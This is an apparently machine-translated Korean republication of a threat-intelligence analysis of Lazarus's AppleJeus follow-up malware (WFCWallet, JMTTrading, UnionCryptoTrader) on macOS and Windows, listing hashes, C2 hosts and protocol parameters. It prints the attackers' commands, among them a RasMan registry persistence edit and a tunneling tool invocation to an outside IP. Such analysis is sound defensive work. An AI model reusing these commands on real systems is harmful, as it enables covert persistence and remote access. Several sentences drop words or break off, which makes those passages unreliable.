AppleJeus 액션 분석을 수행하는 방법

Lazarus 조직은 현재 가장 활동적인 APT 조직 중 하나입니다. 2018년에 Kaspersky는 이 조직에서 시작한 AppleJeus라는 공격 캠페인을 발견했습니다. 이 작업은 macOS 사용자를 공격하기 위해 Lazarus가 macOS 악성 코드를 개발하고 인증 메커니즘을 추가한 것으로, 다음 단계 페이로드를 로드하지 않고 매우 조심스럽게 다운로드할 수 있습니다. Windows 사용자를 공격하기 위해 다단계 감염 프로세스를 개발했습니다. 'AppleJeus' 운영 분석이 공개된 후 Lazarus는 공격을 수행할 때 더욱 조심스러워졌고 탐지를 피하기 위해 더 많은 방법을 채택했습니다.

AppleJeus 후속 조치

AppleJeus 작전 분석을 게시한 후 Lazarus는 유사한 작업 방식을 계속 사용하여 암호화폐 비즈니스를 방해했으며 연구원들은 AppleJeus에서 macOS 악성 코드와 유사한 악성 코드를 더 많이 발견했습니다. 이 macOS 악성 코드는 공개 코드를 사용하여 설치 프로그램을 개발합니다. 악성코드는 Centrabit에서 개발한 QtBitcoinTrader를 사용합니다.

이 세 가지 macOS 설치 프로그램은 유사한 설치 후 스크립트를 사용하여 페이로드를 삭제하고 가져온 2단계 페이로드를 실행할 때 동일한 명령을 사용합니다. 또한, 또 다른 유형의 macOS 악성코드인 MarkMakingBot.dmg(be37637d8f6c1fbe7f3ffc702afdfe1d)도 확인되었습니다. 이 악성코드는 2019-03-12에 생성되었으나 네트워크 통신이 암호화되지 않은 상태로 macOS 악성코드 변형의 중간 단계인 것으로 추측됩니다. 그리고 업그레이드.

Windows 악성 코드의 변경 사항

이 캠페인을 계속 추적한 결과 피해자가 2019년 3월 Windows AppleJeus 악성 코드의 공격을 받은 것으로 나타났습니다. 감염은 WFCUpdater.exe라는 악성 파일로 시작되었으며, 공격자는 가짜 웹사이트인 wfcwallet[.]com을 사용한 것으로 확인되었습니다.

공격자는 기존과 마찬가지로 다단계 감염을 사용했지만 방법이 변경되었습니다. 감염은 WFC 지갑 업데이트 프로그램(a9e960948fdac81579d3b752e49aceda)으로 위장한 .NET 악성코드로 시작됩니다. 이 .NET 파일은 실행 후 명령줄 매개변수가 "/Embedding"인지 확인합니다. 이 악성코드는 하드코딩된 20바이트 XOR 키(82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62)를 사용하여 동일한 폴더에 있는 WFC.cfg 파일의 암호를 해독합니다. 그런 다음 C2 서버에 연결합니다:

wfcwallet.com (해결된 IP: 108.174.195.134)

www.chainfun365.com (해결된 IP: 23.254.217.53)

그런 다음 공격자의 명령을 실행하고 다음 단계를 설치합니다. 유효 탑재량. 공격자는 피해자의 시스템 폴더에 rasext.dll과 msctfp.dat라는 두 개의 파일을 배치합니다. 이들은 RasMan(Remote Access Connection Manager) Windows 서비스를 사용하여 다음 단계 페이로드를 등록합니다. 기본 정찰 후 공격자는 다음 명령을 사용하여 페이로드를 수동으로 설치했습니다.

cmd.exe /c dir rasext.dll

cmd.exe /c dir msctfp.dat

cmd.exe /c tasklist /svc | RasMan

cmd.exe /c reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesRasManThirdParty /v DllName /d rasext.dll /f

공격자는 원격 터널을 구축하기 위해 명령줄 매개 변수를 사용하여 추가 관련 도구를 심었지만 연구원은 확보하지 못했습니다. 더 많은 도구 파일.

포트 오프너:

%APPDATA%LenovodevicecenterDevice.exe 6378

터널링 도구:

%APPDATA%LenovodevicecenterCenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443

macOS 악성 코드 변경

JMTTrading

A 이 캠페인을 추적하는 동안 macOS 악성코드 변종이 발견되었습니다. 공격자는 가짜 웹사이트와 앱을 JMTtrading이라고 부르며, 다른 연구원과 보안 공급업체는 광범위한 기술 세부 정보를 공개했습니다. 이번 공격의 차이점을 강조하겠습니다.

공격자는 GitHub를 사용하여 악성 애플리케이션을 호스팅합니다.

악성코드 작성자는 macOS 악성코드에서 QT 프레임워크 대신 Objective-C를 사용했습니다.

이 악성코드는 macOS 실행 파일 내에 간단한 백도어 기능을 구현합니다.

이전 사례와 마찬가지로 악성코드는 암호화/복호화에 16바이트 XOR 키를 사용합니다.

Windows 버전의 악성 코드는 ADVobfuscator를 사용하여 코드를 숨깁니다.

macOS 악성 코드 설치 스크립트는 이전 버전과 크게 다릅니다.

UnionCryptoTrader

는 macOS를 표적으로 한 또 다른 공격도 확인했습니다. 해당 악성 프로그램은 UnionCryptoTrader라고 하며, 보안 연구원 dineshdina04가 동일한 사례를 발견했습니다. 공격을 요약하면 다음과 같습니다.

설치 스크립트는 JMTtrading에서 사용하는 것과 동일합니다.

맬웨어 작성자는 SWIFT를 사용하여 이 macOS 악성코드를 개발했습니다.

악성코드 작성자가 정보 수집 방법을 에서 변경했습니다.

악성코드는 2단계 페이로드를 전달하기 위해 auth_signature 및 auth_timestamp 매개변수를 사용하여 인증을 시작합니다.

악성코드는 다음 단계 페이로드를 로드하기 위해 디스크 드롭을 요구하지 않습니다.

UnionCryptoTrader의 Windows 버전

연구원들은 Windows 버전의 UnionCryptoTrader(0f03ec3487578cef2398b5b732631fec)를 발견했습니다. 텔레그램 메신저에서 다운로드 및 실행됩니다:

C:Users[사용자 이름]DownloadsTelegram DesktopUnionCryptoTraderSetup.exe

또한 가짜 웹사이트에서 공격자의 텔레그램이 발견되어 공격자가 텔레그램 메신저를 사용하고 있음을 높게 확인할 수 있습니다. 설치 프로그램을 보내드립니다. 페이로드는 메모리에서만 실행되므로 관련 파일을 모두 가져올 수 없습니다. 전체 감염 과정은 WFCWallet과 매우 유사하지만, 주입 과정이 추가됩니다.

UnionCryptoTrader의 Windows 버전에는 여러 암호화폐에 대한 가격 차트를 보여주는 다음 창이 있습니다.

UnionCryptoTrader 업데이트 프로그램의 Windows 버전(629b9de3e4b84b4a0aa605a3e9471b31)은 macOS 버전과 기능이 유사합니다. 빌드 경로(Z:Loaderx64ReleaseWinloaderExe.pdb)를 기반으로 악성코드 작성자는 이 악성코드를 로더라고 부릅니다. 일단 실행되면 악성코드는 피해자의 기본 정보를 검색하여 HTTP POST로 보냅니다.

C2 서버의 응답이 200이면 악성코드는 페이로드를 복호화하여 메모리에 로드합니다. 마지막으로 악성코드는 act=done을 보냅니다. 이 로더(e1953fa319cc11c2f003ad0542bca822)에서 다운로드된 다음 단계 페이로드는 WFCWallet의 .NET 다운로더와 유사합니다. 악성코드는 동일한 폴더에 있는 Adobe.icx 파일의 암호를 해독하고 Internet Explorer 프로세스에 다음 페이로드를 삽입하며 공격자의 명령을 실행하는 역할을 합니다.

최종 페이로드(dd03c6eb62c9bf9adaf831f1d7adcbab)는 WFCWallet과 동일하며 수동으로 심었습니다. 악성 코드 작성자는 이전에 수집한 정보를 사용하여 특정 시스템에서만 작동하는 악성 코드를 심습니다. 악성코드는 감염된 시스템의 정보를 확인하고 이를 주어진 값과 비교합니다.

Windows 악성코드는 암호화된 msctfp.dat 파일을 시스템 폴더에 로드하고 각 구성을 로드합니다. 파일 내용에 따라 추가 명령을 실행합니다. 악성코드가 C2 서버와 통신할 때 미리 정의된 헤더가 있는 POST 요청이 사용됩니다.

초기 통신 악성코드는 먼저 매개변수를 보냅니다:

cgu: 구성의 64비트 16진수 값

aip: 구성의 MD5 해시 값

sv: 하드코딩된 값

C2 서버에서 오는 경우 200 응답으로, 악성코드는 암호화된 데이터와 공격자가 각 피해자를 식별하고 POST 요청을 인증하는 데 사용하는 임의의 값과 함께 다음 POST 요청을 보냅니다.

imp: 무작위로 생성된 값

dsh: imp의 XOR 값

hb_tp: imp의 XOR 값(키: 0x67BF32)

hb_dl: C2 서버로 전송된 암호화된 데이터

ct: 하드코딩된 값

마지막으로 악성코드는 다음 단계 페이로드를 다운로드하여 해독합니다.

또한 인프라를 조사하는 동안 아직 온라인 상태인 여러 가짜 웹사이트가 발견되었습니다.

요약

AppleJeus의 후속 조사에서는 영국, 폴란드, 러시아, 중국에 위치한 여러 피해자가 발견되었으며 일부 피해자는 암호화폐 사업과 관련이 있었습니다.

공격자는 macOS 및 Windows 악성 코드를 변경하여 macOS 다운로더에 인증 메커니즘을 추가하고 macOS 개발 프레임워크를 변경했습니다. Windows 시스템의 감염 과정은 이전 시스템과 다릅니다. Lazarus 그룹은 금전적 이득을 위해 계속해서 공격을 감행할 것입니다.

위 내용은 AppleJeus 액션 분석을 수행하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!